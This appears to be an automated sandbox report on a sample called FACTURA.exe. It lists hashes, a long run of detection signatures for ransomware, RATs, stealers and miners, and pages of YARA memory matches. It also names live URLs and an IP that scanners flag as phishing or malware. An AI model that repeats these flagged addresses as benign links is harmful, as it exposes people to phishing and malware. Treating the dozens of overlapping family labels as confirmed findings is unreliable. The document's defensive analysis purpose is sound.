Windows Analysis Report FACTURA.exe

Overview

General Information

Sample Name: FACTURA.exe
Analysis ID: 1568
MD5: 740463ed3266f7aee8331978f50c731c
SHA1: a9310948476693d72be937f23e1b53b3607bf92f
SHA256: fa9e12a03b909482d5bacd2d7ab1a8d672528bfcf43402c04b6d3a30702b0c4d
Infos:

Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Remcos AESCRYPT Ransomware Annabelle
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Neshta
Detected Hacktool Mimikatz
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Parallax RAT
Yara detected Zeppelin Ransomware
Yara detected Ragnarok ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Yara detected Avaddon Ransomware
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected Koadic
Yara detected Jigsaw
Yara detected CryLock ransomware
Yara detected Pony
Yara detected Sapphire Ransomware
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected RansomwareGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
Yara detected Ouroboros ransomware
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected LimeRAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Ryuk ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected Porn Ransomware
Yara detected LockBit ransomware
Yara detected DarkSide Ransomware
Yara detected LOCKFILE ransomware
Malicious sample detected (through community Yara rule)
Yara detected Cerber ransomware
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected Rhino ransomware
Yara detected Mailto ransomware
Yara detected CoronaCrypt Ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected Buran Ransomware
Yara detected GoGoogle ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Detected Remcos RAT
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected Growtopia
Yara detected Xorist ransomware
Yara detected Windows Security Disabler
Yara detected Dorkbot
Yara detected RevengeRAT
Contains VNC / remote desktop functionality (version string found)
Found strings related to Crypto-Mining
Found Tor onion address
Yara detected MaliciousMacro
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Sample is not signed and drops a device driver
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Found string related to ransomware
Yara detected MSILLoadEncryptedAssembly
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Yara detected BatToExe compiled binary
May drop file containing decryption instructions (likely related to ransomware)
Binary or sample is protected by dotNetProtector
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Yara detected Autohotkey Downloader Generic
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Sample execution stops while process was sleeping (likely an evasion)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Creates driver files
Binary contains a suspicious time stamp
May initialize a security null descriptor
Yara detected Keylogger Generic
Uses 32bit PE files
Yara signature match
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
PE file contains executable resources (Code or Archives)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Yara detected Winexe tool

Classification

AV Detection:

barindex
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Antivirus detection for URL or domain
Source: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: MpSigStub.exe.5556.36.memstrmin Malware Configuration Extractor: CryLock {"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}
Yara detected Njrat
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13% Perma Link
Source: http://110.42.4.180: Virustotal: Detection: 13% Perma Link
Yara detected RevengeRAT
Source: Yara match File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Antivirus or Machine Learning detection for unpacked file
Source: 36.3.MpSigStub.exe.197a4734ab6.49.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.165.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.74.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

barindex
Yara detected Hancitor
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Privilege Escalation:

barindex
Detected Hacktool Mimikatz
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

barindex
Yara detected Coinhive miner
Source: Yara match File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4301256.107.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a2f5336d.108.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4301256.84.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4301256.170.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a365984d.191.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a365bea1.190.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a48adbfa.121.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6349431685.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6356649431.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6300924417.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6314037891.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6330651040.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6310770552.00000197A4B3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6333426467.00000197A331E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6299736334.00000197A2ED4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6294115539.00000197A3970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BitCoin Miner
Source: Yara match File source: 36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a477ec45.51.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4764291.52.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4777703.50.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
